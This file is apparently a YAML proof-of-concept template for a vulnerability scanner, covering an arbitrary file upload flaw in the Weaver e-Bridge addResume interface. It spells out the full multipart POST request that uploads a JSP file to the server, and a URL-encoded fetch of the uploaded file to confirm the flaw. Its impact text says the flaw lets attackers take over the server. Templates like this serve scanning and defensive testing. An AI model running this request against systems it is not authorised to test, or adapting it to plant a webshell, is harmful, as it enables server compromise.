Poc_Scanner/poc/OA-Poc/eBridge-addResume-upload.yaml
2024-10-09 15:15:50 +08:00

36 lines
1.7 KiB
YAML
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

keyword: e-Bridge
name: 泛微云桥任意文件上传漏洞
description: | # 下一行可填写漏洞描述
泛微云桥(e-Bridge)系统接口addResume存在任意文件上传漏洞
requests: # 为空代表默认或者不启用
path: "/wxclient/app/recruit/resume/addResume?fileElementld=111"
method: POST
headers:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryDOVhr5SwLI1wpry7
body-raw: |- # 如果需要发送请求体,在下一行开始填写
------WebKitFormBoundaryDOVhr5SwLI1wpry7
Content-Disposition: form-data; name="file";filename="1.jsp"
<%out.println("vuln");%>
------WebKitFormBoundaryDOVhr5SwLI1wpry7--
Content-Disposition: form-data; name="file";filename="2.jsp"
1
------WebKitFormBoundaryDOVhr5SwLI1wpry7--
response:
path: "/upload/202408/SV/1.js%70" # 不填则默认接收此请求的响应包
status-code: 200
body: "vuln" # 此处可填写响应体中确认漏洞存在的关键字或者其他信息
time: # 此处填写响应包响应时间,默认不启用
headers:
Server:
Content-type:
Content-length:
Date:
Connection:
impact: | # 下一行可填写漏洞影响
泛微云桥e-Bridge是上海泛微公司在”互联网+”的背景下研发的一款用于桥接互联网开放资源与企业信息化系统的系统集成中间件。攻击者可通过任意文件上传漏洞上传文件,获取服务器权限。